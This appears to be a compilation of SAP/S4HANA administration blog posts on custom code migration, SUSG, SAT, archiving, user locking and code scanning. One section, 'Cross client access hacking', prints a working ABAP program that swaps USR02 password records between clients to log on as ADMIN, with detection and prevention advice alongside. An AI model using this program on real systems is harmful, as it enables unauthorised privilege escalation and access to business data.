S4HANA blacklist

With S4HANA SAP has deprecated some parts of their old code. In some weird cases this old code might still be required.

This blog will explain on the S4HANA blacklist. Questions that will be answered are:

  • How do I see a dump is caused by the S4HANA blacklist?
  • Where to find more background information on the S4HANA blacklist?

The S4HANA blacklist dump

If for whatever reason the S4HANA system gives an ABAP dump with the error SYSTEM_ABAP_ACCESS_DENIED, this is a S4HANA blacklist dump. See note 2476734 – Runtime error SYSTEM_ABAP_ACCESS_DENIED.

What to do when you hit a blacklisted item?

The best approach is to avoid doing what you did and look for the functional alternative provided by SAP. Search for the correct simplification item OSS note. In almost all cases SAP provides a solution.

Activating a blacklisted item

OSS note 2249880 – Dump SYSTEM_ABAP_ACCESS_DENIED caused through Blacklist Monitor in SAP S/4HANA on premise, contains the procedure to activate a blacklisted item.

Please make sure you have both the clearance from SAP and the system owner in writing before executing this procedure. Support can be lost and system upgrade in the future can be facing severe blocks. Only execute as last resort after explicit approval.

Include usage data in S4HANA custom code migration FIORI app

With the new S4HANA custom code migration FIORI app you can include system usage data (from productive system) to see which code blocks are used and which ones are not.

This blog will give answers to the following questions:

  • How to collect usage data from productive system?
  • How to include the usage data in the S4HANA custom code migration FIORI app?

This blog assumes you have already setup the S4HANA custom code migration FIORI app. If you have not done this, follow the instructions in this blog.

Collecting usage data in production with transaction SUSG

General recommendations for the use of transaction SUSG can be found in OSS note 2701371 – Recommendations for aggregating usage data using transaction SUSG.

In your productive system start transaction SUSG and activate the usage data aggregation:

If you don’t have sufficient authorizations, you might get this weird screen:

If you see this screen, first check your user authorizations.

SUSG installation

If SUSG does not start in your productive system it needs to be installed first. To install SUSG apply OSS note 2643357 – Installation of Transaction SUSG. This is a TCI based OSS note (see blog).

After the TCI note also apply these OSS notes:

Creating the snapshot

Now that the data collection and aggregation is activated, you will need to be patient. Let the system collect the data for the next few days. Now goto transaction SUSG and check the log that the aggregation went fine:

Now you can create a snapshot in the Manage Snapshots section:

Create the snapshot and download it to a file on your desktop or laptop. If wanted you can setup RFC connection as well.

The security and basis team normally does not like any RFC going from production system to non-production system. So the file option is normally the best way.

Loading the data into your upgraded S4HANA system

In your S4HANA system where your custom code analysis runs now start transaction SUSG and make sure it is active. Now you can upload the snapshot from the productive server you have downloaded in the previous step.

Please make sure that the OSS notes on both your productive system and your S4HANA system are identical. The notes have changes to file format of the download file. If the notes are notes identically applied, you will have file format upload issues. Recommendation is to apply all recent SUSG note to both your productive server and the S4HANA system.

S4HANA custom code migration app with usage data

Now you can finally launch the S4HANA custom code migration app. Create a new analysis. In the usage data part of the app, you can assign the snapshot you have uploaded in the previous section:

Now start the custom code analysis and let it run.

The end results of code being used or not can be seen in the column Usage Information in the Analyze Findings section:

Background information

More background on SUSG setup can be found on this blog.

Activating and using the S4HANA custom code migration FIORI app

This blog will explain about the S4HANA custom code migration FIORI app. Questions that will be answered in this blog are:

  • How to set up the S4HANA custom code migration app?
  • How to run the S4HANA custom code migration app?
  • How do the results of the S4HANA custom code app look like?

Activation of the S4HANA custom code migration FIORI app

The custom code app official specification can be found on the FIORI reference library.

First make sure the basis setup of embedded FIORI in general are done on your S4HANA system. See this blog for background.

And make sure the ATC settings for S4HANA code migration are done. See this blog for background.

Next step: in transaction PFCG create a new role (for example Z_CUSTOM_CODE_APP). Add catalog SAP_BASIS_TCR_T as a launchpad catalog:

Save and activate the role. Assign the users to the role.

In transaction /IWFND/MAINT_SERVICE add the following services (and activate them):

Component External Technical Name
Custom code migration projects SYCM_APS_C_PROJECT_CDS
Analysis of SAP S/4HANA custom code check findings SYCM_APS_C_ATC_FIND_ALP_CDS
Custom code scoping by request entry points SYCM_APS_C_SCP_BY_EP_CDS

Custom code scoping by packages SYCM_APS_C_SCP_BY_PK_CDS

In transaction SICF activate the following nodes:

NW_APS_CCM_PRJ

NW_APS_EXT_LIB

NW_APS_LIB

The core activation actions are now done.

Start transaction /UI2/FLP to start the FIORI launchpad. You will not find the tile. Change the homepage and add the following tile from the catalog:

Before starting, make also sure that in ATC setup the RFC object providers are setup:

You can name the ID, description and group ID the same if you want. Make sure to use RFC destination none.

Creating a project in the app

Now you can start creating a project in the app. Click on the + symbol to add a project;

In the destination fill out the system you have put into the ATC object provider configuration. Than save the project and let it run. In the background the full ATC check is now carried out. This can take some time. You can refresh the project to see the status:

Analyzing the results

When the run is done, you can now analyze the results on the Analysis tab:

Important here is that you have to press the Analyze Findings button to go into the detailed analysis overview:

On the top are the graphical overviews. In the bottom is the detailed list:

You can use the download to excel button for further processing.

During the custom code clean up you can redo the same project, by rerunning the analysis. Or you can decide to run a new project.

Including usage data from productive system

You can also add actual usage data from a productive system in the custom code management app. See this blog.

Known issues and bug fixes

For UI bugs check OSS note 2809550 – Custom Code Migration App – Correction bundle for S/4HANA 1909.

Setting up S4HANA custom code adjustments

You have just upgraded to S4HANA in your sandbox or development system. SPAU and SPAU_ENH processing are done. Next step is the S4HANA custom code adjustments.

Questions that will be answered in this blog are:

  • How to import the SCI variants for S4HANA custom code adjustments?
  • How to import the latest simplification database into your system?
  • How to

Importing the SCI variants

Goto transaction SCI and select the option Utilities and then Import Check Variants. This action will import the required variants. Check that the variants are present now.

In the SCI variant, you can leave everything as delivered out-of-the-box with the exception of the material length option. If you keep the material field business wise to 18 (which most customers do), you need to change the variable from 40 to 18.

Setting up the simplification database

Follow the instructions of OSS note 2241080 – SAP S/4HANA: Content for checking customer specific code, to download the latest content for the simplification database.

Use transaction SYCM to upload the file. Select option Simplification Database and then Import from ZIP File.

Running the ATC tool

Now you can start to setup the ATC tool. For details see this blog.

The ATC variant to run should like like this:

Important here:

  • Select the desired S4HANA readiness check SCI variant
  • Set the package to Z* to select your custom code
  • Tick the box for Calculate quick fix proposals

Now you can start the ATC run:

Set the results to Active to see all the results in Eclipse as well. Pending on your system size lower the default number of processes from 10 to for example 5.

If you run into ATC tool issues for the S4HANA custom code adjustments run: first increase memory parameter rsdb/obj/buffersize in RZ11 to at least 150 MB. Then run again.

Processing the results

The ATC tool will now give a lot of results:

The results from the ATC tool can be distributed to more members by changing the Contact Person. To do this select one or more findings and right click on the Contact Person column, and select the option Change Contact Person.

The basic order of processing the results:

  1. Check simplification OSS note
  2. Fix code
  3. Apply relevant pragma (directly or in Eclipse via quick fix)
  4. Apply exemption

For the exemptions: you can raise them, but different person needs to approve them.

When you are using Eclipse, you might run into issue with exemption request. See OSS note 2815887 - ATC: No Possibility to Request Exemptions in Eclipse for the fix.

Statistics from the ATC runs

If you run the ATC tool weekly, you can use it to track the progress. In the ATC results screen there is a specific button Statistics View:

Default sorting is by type of issue to be solved:

This view can also be sorted on Contact Person. This will enable you to check the progress of each developer with his or her work list.

Using quick fixes with Eclipse

Using quick fixes with Eclipse is a fast way of going through the list. The Eclipse list is based on Contact Person and active results. So you only see in Eclipse the results for your user account.

In Eclipse first select the appropriate views:

Now you can start processing. You will get online help and you can apply the quick fix proposed automatically in stead of keying it in by hand.

You might run into an initial bug with a dump, which is solved by applying OSS note 2647710 - Simple transformation: Inconsistent ST loads. 

The quick fixes are updated with both bugs and new functions. Please check out the new versions of the following OSS notes:

Nice blog on the quick fixes: follow this link.

To enable ABAP backend for Eclipse: follow this link.

Using the S4HANA custom code migration app

You can also use the S4HANA custom code migration app. After completing the setup above and activating the S4HANA embedded FIORI (see this blog), you follow the step in this blog for the setup.

Further background information

More information can be found:

SAT ABAP runtime analysis

The SAT ABAP runtime analysis tool can be used to identify performance problems in ABAP programs.

Questions that will be answered in this blog are:

  • How to run the SAT tool?
  • How to read the results of the SAT tool?

Starting the SAT tool

The SAT ABAP runtime analysis tool can be started with transaction SAT:

Top left there is a Tips & Tricks button. This will bring you the to the following tool:

Here you can compare the optimal and not optimal way of coding. By hitting measure runtime button you can actually compare in real time the difference between the 2 methods.

The performance issue program

To test the tool, we first write a simple test program:

REPORT zperftest2.

DATA: zlt_vbak TYPE TABLE OF vbak.
DATA: zls_vbak TYPE vbak.
DATA: zlt_vbap TYPE TABLE OF vbap.
DATA: zls_vbap TYPE vbap.
DATA: zls_vbap2 TYPE vbap.

SELECT * FROM vbak INTO TABLE zlt_vbak UP TO 100 ROWS.

LOOP AT zlt_vbak INTO zls_vbak.
  SELECT * FROM vbap INTO zls_vbap.
    DO 10000 TIMES.
      zls_vbap2 = zls_vbap.
    ENDDO.
  ENDSELECT.
ENDLOOP.

Now we start the SAT tool, enter the program name. Make sure the tick box evaluate immediately is on and press Execute.

Now the measurement will start.

Result of the trace tool

The result of the trace tool is as follows:

On the left side you see the split in where the program spends it time. Here you can see that most of the time is spend on internal processing and not on SQL statements. SQL statement can be analyzed from the SAT tool or from the ST05 SQL trace tool.

By double clicking on the the internal access the right hand side of the screen is filled. Here you can see in which code blocks the most net and gross time is spent. It does not always point you to the exact statements that are not ok, but it can point you to the program that is causing the biggest delay.

In our case the DO 10000 TIMES loop is the performance killer. With only SQL tracing this cannot be found.

Relevant OSS notes

Check and if needed you can apply these OSS notes to solve bugs in the SAT tool:

2737535 – Slow listing of traces in SAT (ABAP Runtime Analysis)

2779153 – Export/Import not working for large ABAP traces in SAT

2825334 – Remove user specific time reference in transaction SAT (use of SY-ZONLO)

2838533 – Runtime Error in SAT during trace analysis (CL_ATRA_EXPAND)

Analyzing code before upgrade or support package: CDMC toolset

This blog will explain on the use of the CDMC toolset you can run analyzing your custom code, before starting upgrade or support package.

CDMC toolset

Start transaction CNV_CDMC to goto the CDMC overview.

Goto ad hoc analysis:

CNV_CDMC start screen

Start SAP modification run

Determine SAP modifications run

Wait for run to finish. If done, click the Display Results.

Run ready

View results:

Run results

Setback of the modification overview: also OSS notes are marked as modifications.

Other useful runs: Syntax check and Inactive customer objects.

If you run these checks before an upgrade you can save quite some annoying issues during the upgrade itself.

OSS notes

Relevant OSS notes:

2772644 – ST-PI/CDMC: Clearing analysis alv error

SAP database growth control: data archiving business discussions

This blog addresses the main challenge in SAP data archiving for functional object: the discussions with the business.

This blog will give answers to the following questions:

  • When to start data archiving discussion with the business?
  • How to come to good retention periods?
  • What are arguments for not archiving certain data?

Data archiving discussion with the business

Unlike technical data deletion, functional data archiving cannot be done without proper business discussion and approval.

Depending on your business several aspects for data are important:

  • Auditing and Sox needs
  • Tax and legal retention periods
  • Product data requirement
  • And so on…..

Here are some rules of thumb you can use before considering to start up the business discussions about archiving:

Rule of thumb 1: the system is pretty new. At least wait 3 years to get an insight into which tables are growing fast and are worth to investigate for data archiving.
Rule of thumb 2: if your system is growing slowly, but the infrastructure capabilities grow faster: only perform technical clean up and don't even start functional data archiving.
Rule of thumb 3: if you are on HANA: check if the data aging concept for functional objects is stable enough and without bugs. Data aging does not require much work, it is only technical and it does not require much business discussions. Data retrieval from end user perspective is transparent.

Data analysis before starting the discussion

If your system is growing fast and/or you are getting performance complaints, then you need to do proper data analysis before starting any business discussion.

Start with proper analysis on the data. Use the TAANA tool to get insights into the data: how is the distribution of data per document type, per year, per plant/company code etc. If you want to propose retention period of let’s say 5 years, you can use the TAANA results to show what percentage of data you can move out of the database.

Secondly: if you have an idea on which data you want to archive, first execute a trial run on a recent production copy. There might be functional blocks that prevent you from archiving data (like not closed documents).

Third important factor is the ease of data retrieval. Some object have a nice simple data retrieval function, and some are really terrible. If the retrieval is good, the business will more easily accept a shorter retention period.

As last step you can start the business case: how much data will be saved (and how much money hence will be save) and how much performance would be gain. And how much time is needed to be invested for setting up, checking (testing!) and running the data archiving runs.

In practice data archiving business case is only present in very large systems of 5 TB and larger. This sizing tipping point changes in time as hardware gets cheaper and hourly manpower costs go up.

The discussion itself

Take must time in planning for the discussion itself. It is not uncommon that archiving discussions take over a year to complete. The better you are prepared the easier the discussion. It also helps to have a few real performance pain points to get solved via data archiving. There is normally a business owner for this pain point who can help push data archiving.

Cross client access hacking

Most people underestimate how easy it is to gain access from one client to another client. This blog will explain how easy it is to do it.

Questions that will be answered in this blog are:

  • How to execute a cross client access hack?
  • How to detect this attack?
  • What preventive measures should I take to prevent this in my systems?

Cross client hack explained

You have gained access to a maintenance client by any method (most easy is standard users: see blog on this topic). Some basis and security people will waive this away and say: “by having access to client 066 the hacker cannot do anything, since the real business data is stored into a different client”.

So what the hacker will do is simple open the system client for ABAP coding (SCC4 client opening works from any client). Then he loads this simple program:

REPORT ZSWAPUSER. 

data: zls_usr02_1 type usr02. 
data: zls_usr02_2 type usr02. 
data: zls_usr02_t type usr02. 

parameters p_uname1 type usr02-bname. 
parameters p_mandt1 type sy-mandt. 
parameters p_mandt2 type sy-mandt.

select single * from usr02 client specified into zls_usr02_1 where bname eq p_uname1 and mandt = p_mandt1. 

select single * from usr02 client specified into zls_usr02_2 where bname eq p_uname1 and mandt = p_mandt2. 

zls_usr02_t = zls_usr02_1. zls_usr02_t-mandt = p_mandt2. modify usr02 client specified from zls_usr02_t. 
write sy-subrc. 

zls_usr02_t = zls_usr02_2. zls_usr02_t-mandt = p_mandt1. 
modify usr02 client specified from zls_usr02_t. 
write sy-subrc.

In the source client hacked a new user will be created. Let’s say the user ADMIN, which is also existing in the target client. The hacker creates the user ans sets the password in the source client he has access to. Now he runs the program. The program simply reads the password cross client (yes, ABAP can do cross client reading and updating), and then swaps them…..

After the swap the hacker will logon to the target client with the password he has set and enjoys all the roles from the user ADMIN. After he is done, he simply runs the program again. Then the old password is put back again.

Detecting this attack

Detecting this attack directly is very difficult. There are traces:

  • Client opening and closing in the source client
  • The presence of the ABAP code
  • The ABAP action in the source client’s audit log (you did switch on the audit log in all clients, didn’t you? And if you didn’t read this blog how to do it and execute it!)
  • ADMIN access from same terminal as the hacker is using to logon to the source client

Preventive measures

The following preventive measures can be taken:

  • Reset all standard passwords in all systems in all clients (see blog)
  • Delete no longer needed clients 001 and 066 (see blog)
  • Switch on audit logging in all clients (see blog)

Mass locking and end validity date of users

There are 2 good reasons for mass locking and ending validity date of user: security and licenses.

Questions that will be answered in this blog are:

  • How can I mass lock users automatically if they have not logged on for a certain time?
  • How can I mass set the validity date of the users that did not log on for a certain time?

Automatic lock of user after expired logon

In RZ11 you can set parameter login/password_max_idle_productive with an amount in days.

Password max idle initial

If the user (including yourself) did not logon to the system after this amount of days the password is still valid, but it does not allow you to logon.

If the user tries to logon after the period he will see this error message and cannot continue:

Password deactivated

In SU01 such a user looks like this:

Password expired

If you also want to automatically lock users after you give them a new password, use the parameter login/password_max_idle_initial.

Initial passwords is one of the nice ways of entering a system as hacker. Especially if the initial password used by the admin is more or less the same (like Welcome_1234!). Countermeasure: instruct your admins to use the Password Generator. This will generate long random once off password.

Mass setting of user validity date

For user measurement and security reasons you want to limit the validity period as well. Users who are locked still count for user measurement (see blog on license measurement tips & tricks). Users locked and unlocked by some method can be security threat.

Standard SAP program RSUSR_LOCK_USERS (built on top of program RSUSR200) is the tool to achieve this.

It has quite a long selection screen:

RSUSR_LOCK_USERS screen 1

On the first block set the dates for last logon and password change to get a good selection of users.

RSUSR_LOCK_USERS screen 2

On the second block very important to only select Dialog Users.

First run with Test Selection to get a list. If you are happy with the list, run it with Set End Of Validity Period.

Performance and bug notes (OSS search hints RSUSR200 and RSUSR_LOCK_USERS): 
2615606 - SUIM | Search for users with incorrect logon does not work
2628060 - SUIM | RS USR200: Poor performance
2698638 - RSUSR_LOCK_USERS does not unlock users with incorrect logon attempts.
2715833 - SUIM | RSUSR200 - search for users not valid in certain time period returns incorrect results
2770656 - RSUSR_LOCK_USERS: Incorrect selection parameters

Scanning ABAP code: ABAP search tool

This blog will explain how to scan ABAP coding in search of a specific keyword or string. Many times older or badly written programs contain hard code logic like system ID’s, plant codes, movement types, order types etc. When a larger business change happens you need to find these codes in your ABAP code and act on them. This blog will explain how to do this search.

Questions that will be answered are:

  • How does the scan program work?
  • How to search for certain strings?
  • How to search for words in the comments?

ABAP search tool

You can start the ABAP search tool with tcode code_scanner:

Search start screen

For testing 2 simple programs are written:

REPORT zscantest1.

IF syst-sysid EQ 'S4H'.
  WRITE'development system'.
ELSEIF syst-sysid EQ 'S4P'.
  WRITE'production system'.
ENDIF.
REPORT zscantest2.

DATA zt001w TYPE t001w.

SELECT SINGLE werks FROM t001w INTO zt001w.

IF zt001w-werks EQ 'DE01'.
  WRITE'German plant'.
ELSEIF zt001w-werks  EQ 'US01'.
* USA plant
  WRITE'US plant'.
ELSE.
  WRITE'diffferent plant'.
ENDIF.

If we now start a search with the word ‘S4H’ we get this result:

Result search 1

A hard coded SID.

If we search with ‘US01’ we get this result:

Result search 2

A hard coded plant.

If we search with ‘USA’ we get this result:

Result search 3

The word we were looking for is in the comment lines.

Search alternative program RS_ABAP_SOURCE_SCAN

In SAP note 2764076 – CODE_SCANNER not working properly, SAP explains that CODE_SCANNER might not always work for every release. They offer alternative program RS_ABAP_SOURCE_SCAN (there is no transaction code for this program, so start via SE38):

RS_ABAP_SOURCE_SCAN